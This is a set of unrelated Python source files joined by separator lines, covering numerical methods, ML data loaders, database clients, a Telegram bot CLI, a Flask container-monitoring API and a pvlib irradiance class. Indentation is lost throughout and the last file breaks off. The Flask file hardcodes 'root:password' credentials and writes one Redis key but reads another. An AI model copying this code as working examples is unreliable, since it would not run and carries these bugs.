raise RuntimeError, "Expected 'a' to be a square matrix"
if len(b.shape) <> 1:
raise RuntimeError, "Expected 'b' to be a column vector"
if b.shape[0] <> a.shape[0]:
raise RuntimeError, "Expected 'b' to be a column vector"
N = a.shape[0]
for i in range(N):
if a[i, i] == 0.0:
raise RuntimeError, "Singular upper diagonal matrix"
for j in range(0, i):
if a[i, j] <> 0.0: raise RuntimeError, "Matrix not upper diagonal"
x = numpy.zeros(N)
for i in range(N-1, -1, -1):
tmp = 0.0
for j in range(i+1, N):
tmp += a[i, j]*x[j]
x[i] = (b[i]-tmp)/a[i, i]
return x
def singular_value_decomposition_back_substitution(u, w, v, b):
"""Solve an upper diagonal system using svd.
For example, if
A = 3 x 3
[ 1.75 1.5 -2.5
0 -0.5 0.65
0 0 0.25 ]
and
b = [ 0.5 -1 3.5],
the expected result is x = [2.97142857 20.2 14].
>>> from numpy import *
>>> from numpy.linalg import svd
>>> A = matrix(array(
... [[1.75, 1.5, -2.5],
... [0.0, -0.5, 0.65],
... [0.0, 0.0, 0.25]], float))
>>> A
matrix([[ 1.75, 1.5 , -2.5 ],
[ 0. , -0.5 , 0.65],
[ 0. , 0. , 0.25]])
>>> b = array([0.5, -1.0, 3.5])
>>> b
array([ 0.5, -1. , 3.5])
>>> u, w, v = svd(A)
>>> x = singular_value_decomposition_back_substitution(u, w, v, b)
>>> x = matrix(x).transpose() # column vector
>>> x
matrix([[ 2.97142857],
[ 20.2 ],
[ 14. ]])
"""
if len(u.shape) <> 2:
raise RuntimeError, "Expected 'u' to be a matrix"
if len(w.shape) <> 1:
raise RuntimeError, "Expected 'w' to be a column vector"
if len(v.shape) <> 2:
raise RuntimeError, "Expected 'v' to be a matrix"
if len(b.shape) <> 1:
raise RuntimeError, "Expected 'b' to be a column vector"
m = u.shape[0]
n = u.shape[1]
if w.shape[0] <> n:
raise RuntimeError, "'w' column vector has incorrect size"
if b.shape[0] <> m:
raise RuntimeError, "'b' column vector has incorrect size"
if v.shape[0] <> n or v.shape[1] <> n:
raise RuntimeError, "'v' matrix has incorrect size"
tmp = numpy.zeros(n)
for j in range(n):
s = 0.0
if w[j] <> 0:
for i in range(m):
s += u[i, j]*b[i]
s /= w[j]
tmp[j] = s
x = numpy.zeros(n)
for j in range(n):
s = 0.0
for jj in range(n):
s += v[jj, j]*tmp[jj]
x[j] = s
return x
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
_test()
|
'''
@author Tian Shi
Please contact tshi@vt.edu
'''
import json
import torch
from torch.autograd import Variable
from transformers import BertTokenizer
from .model_base import modelClassificationBase
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
class modelClassificationBaseBert(modelClassificationBase):
'''
    Classification.
Rewrite vocabulary module.
Use Bert encoder.
'''
def __init__(self, args):
super().__init__(args=args)
self.pretrained_models = {}
def build_vocabulary(self):
'''
        No separate vocabulary needs to be built; the pretrained BERT tokenizer supplies it.
'''
pass
def build_batch(self, batch_):
'''
get batch data
'''
len_review = []
review_arr = []
rating_arr = []
for line in batch_:
arr = json.loads(line)
rating_arr.append(int(arr['label']))
toks = tokenizer.encode(arr['text'])
len_review.append(len(toks))
review_arr.append(toks)
review_lens = min(self.args.review_max_lens, max(len_review))
review_arr = [itm[:review_lens] for itm in review_arr]
review_arr = [itm + [0 for _ in range(review_lens-len(itm))]
for itm in review_arr]
review_var = Variable(torch.LongTensor(review_arr))
rating_var = Variable(torch.LongTensor(rating_arr))
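        # pad_mask marks every non-padding position (token id != 0) with 1.0;
        # attn_mask additionally zeroes out the special [CLS] (id 101) and [SEP] (id 102)
        # tokens that the bert-base-uncased tokenizer adds around each review.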
pad_mask = Variable(torch.FloatTensor(review_arr))
pad_mask[pad_mask != float(0)] = -1.0
pad_mask[pad_mask == float(0)] = 0.0
pad_mask = -pad_mask
attn_mask = Variable(torch.FloatTensor(review_arr))
attn_mask[attn_mask == float(101)] = 0.0
attn_mask[attn_mask == float(102)] = 0.0
attn_mask[attn_mask != float(0)] = -1.0
attn_mask[attn_mask == float(0)] = 0.0
attn_mask = -attn_mask
self.batch_data['input_ids'] = review_var.to(self.args.device)
self.batch_data['label'] = rating_var.to(self.args.device)
self.batch_data['attn_mask'] = attn_mask.to(self.args.device)
self.batch_data['pad_mask'] = pad_mask.to(self.args.device)
|
def pairs(k, arr):
"""Hackerrank Problem: https://www.hackerrank.com/challenges/pairs/problem
You will be given an array of integers and a target value. Determine the number of pairs of array elements that
have a difference equal to a target value.
Args:
k (int): The target difference
arr (list): list of integers
Returns:
int: number of pairs of integers whose difference is k
"""
vals = {i: 1 for i in arr}
count = 0
for i in arr:
try:
count += vals[i + k]
except KeyError:
pass
return count
if __name__ == "__main__":
assert pairs(2, [1, 5, 3, 4, 2]) == 3
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 27 18:32:12 2022
Author: Carlos Armando De Castro (cadecastro.com)
"""
def interpolacion_lagrange(x,y,xi):
yi=0
N=len(x)
for i in range(0,N):
L=1
for j in range(0,N):
if j!=i:
L=L*(xi-x[j])/(x[i]-x[j])
yi=yi+L*y[i]
return yi
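
# Minimal usage sketch (sample points chosen purely for illustration, not part of the original file):
# interpolating through (1, 1), (2, 4), (3, 9) reproduces y = x**2, so xi = 2.5 yields 6.25.
if __name__ == "__main__":
    x = [1.0, 2.0, 3.0]
    y = [1.0, 4.0, 9.0]
    print(interpolacion_lagrange(x, y, 2.5))  # -> 6.25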
|
# Copyright 2015 Rackspace
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pymongo
from pymongo import MongoClient
from cafe.common.reporting import cclogging
from cafe.engine.clients.base import BaseClient
class BaseMongoClient(BaseClient):
"""
@summary: Designed to be a simple interface to make calls to MongoDB
"""
FAILED = 'failed'
SUCCESS = 'success'
_log = cclogging.getLogger(__name__)
def __init__(self, hostname, db_name, username, password):
super(BaseMongoClient, self).__init__()
self.hostname = hostname
self.db_name = db_name
self.username = username
self.password = password
self.connection = None
self.db = None
@classmethod
def from_connection_string(cls, uri):
params = pymongo.uri_parser.parse_uri(uri)
hosts = params.get('nodelist')
if len(hosts) == 0:
raise Exception("Invalid connection string: {uri}".format(
uri=uri))
host, port = hosts[0]
return cls(hostname=host, db_name=params.get('database'),
username=params.get('username'),
password=params.get('password'))
def is_connected(self):
if self.connection:
return self.connection.alive()
return False
def connect(self, hostname=None, db_name=None):
"""
@summary: Connects to a server, but does not authenticate.
@param hostname: if not specified it'll attempt to use init hostname
@param db_name: if not specified it'll attempt to use init db_name
@return:
"""
if hostname is None:
hostname = self.hostname
if db_name is None:
db_name = self.db_name
self.connection = MongoClient(hostname)
self.db = self.connection[db_name]
result = 'Connected' if self.is_connected() else 'Failed to connect'
self._log.debug('{0} to MongoDB: {1}'.format(result, hostname))
return self.SUCCESS if self.is_connected() else self.FAILED
def disconnect(self):
self.connection.close()
self._log.debug('Disconnected from MongoDB')
def auth(self, username=None, password=None):
"""
@summary: Attempts to auth with a connected db. Returns FAILED if
there isn't an active connection.
@param username: if not specified it'll attempt to use init username
@param password: if not specified it'll attempt to use init password
@return:
"""
if not self.is_connected():
return self.FAILED
if username is None:
username = self.username
if password is None:
password = self.password
if username and password:
self.db.authenticate(name=username, password=password)
return self.SUCCESS
def find_one(self, db_obj_name, filter=None):
result_filter = filter or dict()
if not self.is_connected():
return self.FAILED
db_obj = self.db[db_obj_name]
return db_obj.find_one(result_filter)
def delete(self, db_obj_name, filter=None, just_one=True):
result_filter = filter or dict()
if not self.is_connected():
return self.FAILED
db_obj = self.db[db_obj_name]
return db_obj.remove(result_filter, just_one)
|
import oneflow
from oneflow.utils.data import Dataset
import cv2
import os
import glob
import random
class SelfDataSet(Dataset):
def __init__(self, data_path):
self.data_path = data_path
self.imgs_path = glob.glob(os.path.join(data_path, "*.png"))
def augment(self, image, flipcode):
flip = cv2.flip(image, flipcode)
return flip
def __getitem__(self, index):
image_path = self.imgs_path[index]
label_path = image_path.replace("image", "label")
image = cv2.imread(image_path)
label = cv2.imread(label_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
label = cv2.cvtColor(label, cv2.COLOR_BGR2GRAY)
image = image.reshape(1, image.shape[0], image.shape[1])
label = label.reshape(1, label.shape[0], label.shape[1])
if label.max() > 1:
label = label / 255
flipcode = random.choice([-1, 0, 1, 2])
if flipcode != 2:
image = self.augment(image, flipcode)
label = self.augment(label, flipcode)
return image, label
def __len__(self):
return len(self.imgs_path)
if __name__ == "__main__":
data_path = "train_image"
plate_dataset = SelfDataSet(data_path)
print(len(plate_dataset))
train_loader = oneflow.utils.data.DataLoader(
dataset=plate_dataset, batch_size=5, shuffle=True
)
for image, label in train_loader:
print(label.shape)
|
v = int(input())  # pool volume in liters
p1 = int(input())  # pipe 1 flow rate, liters per hour
p2 = int(input())  # pipe 2 flow rate, liters per hour
n = float(input())  # hours the pipes stay open
litters_p1 = p1 * n
litters_p2 = p2 * n
all_litters_from_p1_p2 = litters_p1 + litters_p2
percent_pool = all_litters_from_p1_p2 / v * 100
percent_p1 = litters_p1 / all_litters_from_p1_p2 * 100
percent_p2 = litters_p2 / all_litters_from_p1_p2 * 100
overflow_pool = all_litters_from_p1_p2 - v  # liters over capacity (overflow)
if v >= all_litters_from_p1_p2:
print(f"The pool is {percent_pool:.2f}% full. Pipe 1: {percent_p1:.2f}%. Pipe 2: {percent_p2:.2f}%.")
elif v < all_litters_from_p1_p2:
print(f"For {n:.2f} hours the pool overflows with {overflow_pool:.2f} liters.")
|
# This is an example of adding a custom plugin to Projeny
# If you uncomment this then initialize a new project (for eg. "prj -p MyProject -bf")
# Then after that completes there should be a new file at UnityProjects/MyProject/MyP-win/MyExampleFile.txt
#import mtm.ioc.Container as Container
#from mtm.ioc.Inject import Inject
#class CustomProjectInitHandler:
#_varMgr = Inject('VarManager')
#def onProjectInit(self, projectName, platform):
#outputPath = self._varMgr.expand('[ProjectPlatformRoot]/MyExampleFile.txt')
#with open(outputPath, 'w') as f:
#f.write("This is a sample of configuring the generated project directory")
#Container.bind('ProjectInitHandlers').toSingle(CustomProjectInitHandler)
|
#!/usr/bin/env python
import argparse
import biom
from biom.util import biom_open
import numpy as np
import pandas as pd
from scipy.sparse import coo_matrix
import scipy as sp
def main(args):
table = biom.load_table(args.table)
aligns = pd.read_table(args.align, header=None)
seq_to_genome = aligns[[0, 2, 4]].groupby(by=[0]).min()[2]
ids = list(set(seq_to_genome.index) & set(table.ids(axis='observation')))
t = table.filter(ids, axis='observation')
bin_f = lambda i, x: seq_to_genome.loc[i]
t = t.collapse(bin_f, norm=False, min_group_size=1, axis='observation')
#t = groupby_sum(t, seq_to_genome)
with biom_open(args.output_table, 'w') as f:
t.to_hdf5(f, 'collapsed')
if __name__ == "__main__":
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('--table', type=str, required=True,
help='Path to biom table.')
parser.add_argument('--align', type=str, required=True,
help='Path to sam alignments.')
parser.add_argument('--output-table', type=str, required=True,
                        help='Path to the output biom table.')
args = parser.parse_args()
main(args)
|
import random
import string
class Helper:
""" Helper function just to do some stuff. """
def get_random_string(self, length):
""" Function to generate random string. """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
|
import requests
import json
import csv
import sys
# Stream List
resp = requests.get('http://listen.di.fm/[streamlist]')
resplist = resp.json()
respsort = sorted(resplist, key=lambda k: k['name'])
respfinal = []
for i in respsort:
print(i['id'],"\t",i['name'])
respfinal.append({'id': i['id'], 'name': i['name'], 'key': i['key']})
# Save Stream List to CSV
with open('streamlist.csv', 'w') as csvfile:
fieldnames = ['id', 'name', 'key']
writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames)
writer.writeheader()
for i in respfinal:
writer.writerow(i)
# Get Track List from Stream ID
streamid = input("Enter Stream ID: ")
tlurl = 'http://api.audioaddict.com/v1/di/track_history/channel/' + streamid
resp = requests.get(tlurl)
resplist = resp.json()
respsort = sorted(resplist, key=lambda k: k['started'])
respfinal = []
for i in respsort:
if i['artist'] != None:
if i['title'] != None:
print(i['artist'],"-",i['title'])
respfinal.append({'artist': i['artist'], 'title': i['title'], 'duration': i['duration'], 'started': i['started']})
# Save Track List to CSV
with open('tracklist.csv', 'a') as csvfile:
fieldnames = ['artist', 'title', 'duration', 'started']
writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames)
writer.writeheader() # Removed while appending entries.
for i in respfinal:
writer.writerow(i)
|
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from django.utils.safestring import mark_safe
from .models import Car, SubType, Transmission, Fuel
from src.medias.models import Photo, Video
class PhotoInline(GenericTabularInline):
model = Photo
extra = 3
max_num = 15
class VideoInline(GenericTabularInline):
model = Video
max_num = 1
class CarModelAdmin(admin.ModelAdmin):
list_display = [
'model',
'brand',
'year',
'sub_type',
'price',
'status',
'views',
]
list_display_links = [
'model',
]
list_editable = [
'brand',
'year',
'sub_type',
'price',
'status',
]
list_filter = [
'brand',
'model',
'sub_type',
'status',
]
search_fields = [
'brand',
'model',
'year',
'description',
'status',
]
# fieldsets = [
# (_('Author'), {'fields': ['author','']}),
# ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),
# ]
readonly_fields = ["imagen_principal_del_carro"]
def imagen_principal_del_carro(self, obj):
return mark_safe('<img src="{url}" width="{width}" height={height} />'.format(
url=obj.img.url,
width=obj.img.width / 3,
height=obj.img.height / 3,
)
)
inlines = [PhotoInline]
class Meta:
model = Car
admin.site.register(Car, CarModelAdmin)
admin.site.register(SubType)
admin.site.register(Fuel)
admin.site.register(Transmission)
|
# library
from click.decorators import command
from pyngrok import ngrok
import requests
import json
import click
from click import echo, style
from pyfiglet import Figlet
import colorama
import os.path
import subprocess
import shutil
import os
from time import sleep
import sys
# start
banner = Figlet(font="slant")
banner_txt = banner.renderText("RaRa")
echo(style(banner_txt, fg='blue'))
dirmain = os.path.dirname(os.path.abspath(__file__))
dirBot = dirmain+"\\Bot"
# defs
def copyDirectory(src, dest):
try:
shutil.copytree(src, dest)
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
except OSError as e:
print('Directory not copied. Error: %s' % e)
def editfile(file, content):
path = dirBot+'//'+file
with open(path, "w") as f:
f.write(content)
def Botedit(port, token):
editfile('tools/local/public.bat',
f'@echo off\nrara public {port} ../../src/token.txt')
editfile('tools/local/local.bat', f'@echo off\nrara php {port} ../../src')
editfile(
'local.bat', f'@echo off\ncd tools/local\nstart cmd /c local.bat \npublic.bat')
editfile('src/token.txt', token)
def creatproject(name, port, token):
Botedit(port, token)
copyDirectory(dirBot, name)
def token_read(path):
f = open(path, 'r')
return f.read()
@click.group(chain=True)
@click.version_option("0.1.0")
def cli():
pass
@cli.command('public',)
@click.argument('port')
@click.argument('token', required=False)
def public(port, token=""):
"""
public url <port>(required) <token> (telegram bot - file/text)
"""
if port:
tun = ngrok.connect(port, bind_tls=True)
url = tun.public_url
if token:
if os.path.isfile(token):
bot = token_read(token)
else:
bot = token
send = "https://api.telegram.org/bot"+bot+"/setWebhook?url="+url
api = requests.get(send)
text = api.text
result = json.loads(text)
if result['ok'] == True:
echo(style("\nWebhook is set", bold=True, fg='green'))
else:
echo(style("\nWebhook isn't set", bold=True, fg='red'))
echo(
style("\nERROR : "+result['description'], bold=True, fg='red'))
exit()
echo(
style(f"\nLocal Server Listen http://localhost:{port}", bold=True, fg='green'))
echo(style('\nPublic Server listen : '+url, bold=True, fg='green'))
ngrok_process = ngrok.get_ngrok_process()
try:
ngrok_process.proc.wait()
except KeyboardInterrupt:
echo(style("\n\nServer is off", bold=True, fg='red'),)
ngrok.kill()
@cli.command('php')
@click.argument('port')
@click.argument('path', required=False)
def php(port, path):
"""
start php <port>(required) <path>
"""
if path:
subprocess.call(f"php -S localhost:{port} -t {path}")
else:
subprocess.call(f"php -S localhost:{port}")
@cli.command('create')
@click.argument('name')
def create(name):
"""
Create New Telegram bot project php <name>(required)
"""
port = int(click.prompt(style('Project Port ', fg='green')))
token = click.prompt(style('\nTelegram Bot Token ', fg='green'))
vscode = str(click.prompt(style('\nOpen in vscode ?[y/n]', fg='green')))
creatproject(name, port, token)
project = os.getcwd()+"/"+name
if vscode.lower() == 'y':
os.system("code "+project)
def main():
cli()
# run
if __name__ == "__main__":
main()
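# Typical invocations, assuming the package is installed with `rara` as the console entry point
# (the generated .bat helpers above call it that way):
#   rara create mybot          # scaffold a new bot project
#   rara public 8000 token.txt # expose localhost:8000 via ngrok and set the Telegram webhook
#   rara php 8000 src          # serve ./src with PHP's built-in server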
|
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
import redis
from flask_cors import *
import time
import json
from pyecharts import options as opts
from pyecharts.charts import Graph
# /*----------------Flask and DB----------------*/
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "mysql+mysqldb://root:password@localhost:3306/package"
db = SQLAlchemy(app)
r = redis.Redis(host="127.0.0.1", port=6379)
CORS(app, supports_credentials=True)
# /*----------------DB Model----------------*/
# collected package
class Pkg(db.Model):
__tablename__ = 'pkg'
id = db.Column(db.Integer, primary_key=True)
Ty = db.Column(db.String(8)) # type
protocol = db.Column(db.String(10))
daddr = db.Column(db.String(40))
dport = db.Column(db.Integer)
saddr = db.Column(db.String(40))
sport = db.Column(db.Integer)
send_byte = db.Column(db.Integer)
recv_byte = db.Column(db.Integer)
time = db.Column(db.Integer)
pid = db.Column(db.Integer)
com = db.Column(db.String(20))
host = db.Column(db.String(40))
# doubt IP and danger IP
class BanIP(db.Model):
__tablename__ = "banIP"
id = db.Column(db.Integer, primary_key=True)
ban_ip = db.Column(db.String(40))
banned = db.Column(db.Boolean)
def __init__(self, ban_ip, banned):
self.ban_ip = ban_ip
self.banned = banned
# /*----------------Helper Function----------------*/
def ban(saddr, banned=True): # True => banned, False => warning
item = BanIP.query.filter(BanIP.ban_ip == saddr).first()
print(item)
if item is None:
new_ban_ip = BanIP(ban_ip=saddr, banned=banned)
db.session.add(new_ban_ip)
if banned:
r["update_time"] = int(time.time())
db.session.commit()
elif item.banned != banned:
item.banned = banned
r["update_time"] = int(time.time())
db.session.commit()
else:
print("Banned ip add failed. " + str(saddr) + " exists.")
def broadcast_to_clients():
import json
banned_IPs = []
IPs = BanIP.query.filter(BanIP.banned == True).all()
for ip in IPs:
banned_IPs.append(ip.ban_ip)
r.publish("Banned IPs", json.dumps(banned_IPs))
def add_danger_ip(saddr):
ban(saddr, banned=True)
def add_doubt_ip(saddr):
ban(saddr, banned=False)
# /*----------------IP Control Interface----------------*/
# Traffic for the previous second: timestamp and byte count
@app.route("/getnetdata", methods=["GET"])
def getNetData():
hostIP = request.args.get("hostip")
dockerIP = request.args.get("dockerip")
protocol = request.args.get("protocol")
now = time.time()
print(Pkg.query.all()[-1].time)
print(now)
print(hostIP)
print(dockerIP)
print(protocol)
pkgs = Pkg.query.filter(Pkg.daddr == dockerIP, Pkg.protocol == protocol, Pkg.host == hostIP,
Pkg.time >= now - 2).all()
print(pkgs)
ret = 0
last_time = int(time.time())
try:
last_time = pkgs[-1].time
except:
pass
for pkg in pkgs:
ret += pkg.send_byte + pkg.recv_byte
data = {
"byte": ret,
"time": last_time
}
return jsonify(data)
# Set IP rules
@app.route("/setbanip", methods=["POST"])
def setBanIP():
data = request.json.get("data")
value = request.json.get("value")
global dangerip
global doubtip
dangerips = []
doubtips = []
# get the rules
for i in data:
if i["key"] in value:
# print(doubtips)
dangerips.append(i)
else:
doubtips.append(i)
# update the database
for i in dangerips:
add_danger_ip(i["label"])
for i in doubtips:
add_doubt_ip(i["label"])
    # use redis to send msg to hosts
broadcast_to_clients()
return "OK"
# Get all suspicious and dangerous IPs
@app.route("/getbanip", methods=["GET"])
def getBanIP():
ret = {
"danger": [],
"doubt": []
}
IPs = BanIP.query.filter().all()
for ip in IPs:
if ip.banned:
ret["danger"].append(ip.ban_ip)
else:
ret["doubt"].append(ip.ban_ip)
return jsonify(ret)
# /*----------------Typology Show Interface----------------*/
# Receive Msg From Hosts
@app.route("/refreshdockermsg", methods=["POST"])
def dockerMsg():
data = request.json
host = data["host"]
datalist = data["data"]
r.hset("topology", host, datalist)
return "ok"
@app.route("/getdockermsg", methods=["GET"])
def getDockerMsg():
host = request.args.get("host")
docker = request.args.get("docker")
dockers = json.loads(r.hget("typology", host))
tar = None
for doc in dockers:
print(doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"], docker)
if docker == doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]:
tar = doc
break
return jsonify(tar)
@app.route("/getdockerstats", methods=["GET"])
def getDockerStats():
dockerID = request.args.get("dockerid")
r.publish("Container Msg", dockerID)
start = int(time.time())
while True:
stats = r.get("containermsg")
if stats is not None:
break
elif int(time.time())-start > 2:
break
    ret = json.loads(stats) if stats is not None else {}  # guard against a timed-out lookup
return jsonify(ret)
@app.route("/getipsortlist")
def getIPSortList():
ipdata = Pkg.query.all()
ipdict = {}
for i in ipdata:
ipdict[i.saddr] = 0
for i in ipdata:
ipdict[i.saddr] += 1
sortlist = sorted(ipdict.items(), key=lambda kv:(kv[1], kv[0]), reverse=True)
return jsonify(sortlist)
@app.route("/getradarmsg")
def getRadarMsg():
danger = []
doubt = []
IPs = BanIP.query.all()
for ip in IPs:
if ip.banned:
danger.append(ip.ban_ip)
else:
doubt.append(ip.ban_ip)
ipdata = Pkg.query.all()
ipdict = {}
averpkg = 0
maxpkg = 0
pkgcnt = 0
for i in ipdata:
pkgcnt += 1
averpkg += i.send_byte + i.recv_byte
if i.send_byte + i.recv_byte > maxpkg:
maxpkg = i.send_byte + i.recv_byte
ipdict[i.saddr] = 0
if averpkg != 0:
averpkg /= pkgcnt
totalipnum = len(ipdict)
hostips = r.hkeys("typology")
# print(hostips)
hosts = [json.loads(r.hget("typology", hostip)) for hostip in hostips]
# print(hosts)
maxmemuse = 0
avermemuse = 0
cnt = 0
for host in hosts:
for i in host:
cnt += 1
avermemuse += i["stats"]["memory_stats"]["usage"]
if i["stats"]["memory_stats"]["max_usage"] > maxmemuse:
maxmemuse = i["stats"]["memory_stats"]["max_usage"]
if cnt != 0:
avermemuse /= cnt
print("cnt=", cnt)
return jsonify({
"dangerrate": len(danger)/totalipnum,
"doubtrate": len(doubt)/totalipnum,
"maxmemuse": maxmemuse,
"avermemuse":avermemuse,
"averpkg": averpkg,
"maxpkg": maxpkg
})
def graph_base() -> Graph:
nodes = []
links = []
categories = [
{"symbol": "circle", 'name': 'ryu'},
{"symbol": "diamond", 'name': 'host'},
{"symbol": "roundRect", 'name': 'dockerdata'},
]
ryu = opts.GraphNode(name="RYU", symbol_size=40, category=0) # symbol='roundRect'
nodes.append(ryu)
doc_id = 1
for key in r.hkeys("typology"):
host = opts.GraphNode(name=key, symbol_size=30, category=1) # symbol='diamond'
nodes.append(host)
ryuHostLink = opts.GraphLink(source="RYU", target=key)
links.append(ryuHostLink)
dockerlist = json.loads(r.hget("typology", key))
print(dockerlist)
for doc in dockerlist:
docName = doc["Names"][0]
docInfo = str(key, encoding='utf-8') + '/' + doc["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]
new_node = opts.GraphNode(name=str(doc_id) + docName, symbol_size=20, category=2, value=docInfo)
nodes.append(new_node)
hostDocLink = opts.GraphLink(source=key, target=str(doc_id) + docName)
links.append(hostDocLink)
doc_id += 1
linestyle_opts = opts.LineStyleOpts(
is_show=True,
width=2,
curve=0.1,
type_="solid",
color="orange",
)
g = (
Graph()
.add("", nodes, links, repulsion=1000, categories=categories,
label_opts=opts.LabelOpts(is_show=True, position="left", color='white'),
linestyle_opts=linestyle_opts)
.set_global_opts(title_opts=opts.TitleOpts(title=""))
)
return g
@app.route("/graphchart", methods=["GET"])
def get_bar_chart():
c = graph_base()
return c.dump_options_with_quotes()
if __name__ == '__main__':
app.run(host="127.0.0.1", port=5000, debug=True)
|
import sys, os
sys.path.append(os.pardir)  # allow importing modules from the parent directory
import numpy as np
from dataset.mnist import load_mnist
from controllers.controller import Controller
from modules.pklController import PKL
# Load the data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
# Settings
# Hyperparameters
#iters_num = 10000 # set the number of iterations as appropriate
iters_num = 100000 # set the number of iterations as appropriate
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
filename = "mymnist_01.pkl"
# instance
controller = Controller()
pkl = PKL()
# exec
params = pkl.getRandomPKL(iters_num, train_size, batch_size, learning_rate)
controller.setParams(params)
# savePKL
pkl.savePKL(filename, params)
# accuracy
trycount = 1000
accuracy_cnt = 0
result = np.zeros((10, 10))
for i in range(len(x_test)):
p = controller.accuracy(x_test[i])
a = np.argmax(t_test[i])
#print("p = " + str(p))
#print("a = " + str(a))
result[p][a] += 1
#print(t_test[i])
if p == a:
accuracy_cnt += 1
if (i == trycount):
break
print("Accuracy:" + str(float(accuracy_cnt) / trycount))
print(result)
|
from django.db import models
from improved_user.model_mixins import AbstractUser
# Create your models here.
class User(AbstractUser):
"""A User model that extends the Improved User"""
is_rowo = models.BooleanField(
default=False, help_text="Is the User a Robin Wood member?"
)
|
import pandas as pd
import numpy as np
import pvlib
import logging
log = logging.getLogger(__name__)
class IrradianceDataset(pd.DataFrame):
"""pandas.DataFrame extension class for location-aware irradiance data
This class is intended to make life a bit easier when working with irradiance
datasets. It extends pandas.DataFrame by adding a `location` attribute, which
gives access to a pvlib.location.Location object, allowing for generation
of solar position and clear sky data.
In addition, several helper attributes are provided to automate certain
operations:
Parameters
----------
    data : a pandas.DataFrame, OR any argument that can be passed to a DataFrame
constructor, such as a list of dicts.
location : a pvlib.location.Location instance
Attributes
----------
g : irradiance components
clear : clear-sky irradiance components
sp : solar position data
    k : clearness index components
k_star : filtered clearness index components
k_star_angle : solar elevation threshold for the filtered clearness index
        set to 7 by default
k_star_sensitivity : sensitivity parameter for the filtered clearness index
set to 50 by default
Example
-------
```
data = IrradianceDataset(df, location)
data.k_star.plot()
```
"""
_metadata = ['location', 'k_star_sensitivity', 'k_star_angle']
@classmethod
def _internal_ctor(cls, *args, **kwargs):
kwargs['location'] = None
return cls(*args, **kwargs)
def __init__(self, data, location=None, index=None, columns=None, dtype=None, copy=True):
super(IrradianceDataset, self).__init__(data=data,
index=index,
columns=columns,
dtype=dtype,
copy=copy)
self.location = location
self.k_star_sensitivity = 50
self.k_star_angle = 7
@property
def _constructor(self):
return IrradianceDataset
@property
def _constructor_sliced(self):
return IrradianceDatasetSeries
@property
def is_complete(self):
"""Returns true if this dataset has all three of ghi, dni, and dhi"""
return {'ghi', 'dhi', 'dni'} <= set(self.columns)
@property
def is_ghi_only(self):
"""Returns true if this dataset has only ghi"""
c = self.columns
return 'ghi' in c and 'dhi' not in c and 'dni' not in c
def complete_irradiance(self):
"""This code adapted from pvlib."""
cols = set(self.columns)
if {'ghi', 'dhi'} <= cols and 'dni' not in cols:
log.info("Completing DNI irradiance")
self.loc[:, 'dni'] = pvlib.irradiance.dni(
self['ghi'],
self['dhi'],
self.sp.zenith,
clearsky_dni=self.clear.dni,
clearsky_tolerance=1.1)
elif {'dni', 'dhi'} <= cols and 'ghi' not in cols:
log.info("Completing GHI irradiance")
self.loc[:, 'ghi'] = (
                self['dni'] * np.cos(np.radians(self.sp.zenith)) +
                self['dhi'])
elif {'dni', 'ghi'} <= cols and 'dhi' not in cols:
log.info("Completing DHI irradiance")
self.loc[:, 'dhi'] = (
self['ghi'] - self['dni'] * np.cos(np.radians(self.sp.zenith))
)
return self
@property
def g(self):
if len({'ghi', 'dni', 'dhi'} & set(self.columns)) == 0:
log.info("No irradiance data. Trying to build from clearness index.")
g = self.clear * self.k_star
for col in g:
self.loc[:, col] = g[col]
if not (self.is_complete or self.is_ghi_only):
self.complete_irradiance()
return pd.DataFrame(
self[[col for col in self.columns if col in ('ghi', 'dni', 'dhi')]]
)
@property
def sp(self):
sp_cols = list(filter(lambda c: c[:3] == 'sp_', self.columns))
if len(sp_cols) == 0:
log.info("Calculating solar position")
sp = self.location.get_solarposition(self.index)
sp_cols = [f'sp_{col}' for col in sp.columns]
for old, new in zip(sp.columns, sp_cols):
self.loc[:, new] = sp[old]
return pd.DataFrame(
self[sp_cols]
).rename(columns={col:col[3:] for col in sp_cols})
@property
def clear(self):
clear_cols = list(filter(lambda c: c[:6] == 'clear_', self.columns))
if len(clear_cols) == 0:
# TODO add a check that the clear cols correspond to the g cols
log.info("Calculating clear sky irradiance")
clear = self.location.get_clearsky(self.index, solar_position=self.sp)
clear_cols = [f'clear_{col}' for col in clear.columns if col in self.columns or f'k_{col}' in self.columns]
for old, new in zip(clear.columns, clear_cols):
self.loc[:, new] = clear[old]
return pd.DataFrame(
self[clear_cols]
).rename(columns={col:col[6:] for col in clear_cols})
@property
def k(self):
k_cols = list(filter(lambda c: c[:2] == 'k_', self.columns))
if len(k_cols) == 0:
log.info("Calculating clearness index")
k = self.g / self.clear
k_cols = [f'k_{col}' for col in k.columns]
for old, new in zip(k.columns, k_cols):
self.loc[:, new] = k[old]
return pd.DataFrame(
self[k_cols]
).rename(columns={col:col[2:] for col in k_cols})
@property
def k_star(self):
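        # Filtered clearness index: a logistic weight (steepness set by k_star_sensitivity)
        # is ~1 when the solar elevation is above k_star_angle degrees and ~0 below it.
        # Where the sun is up, k_star follows k (with inf/NaN from the g/clear division
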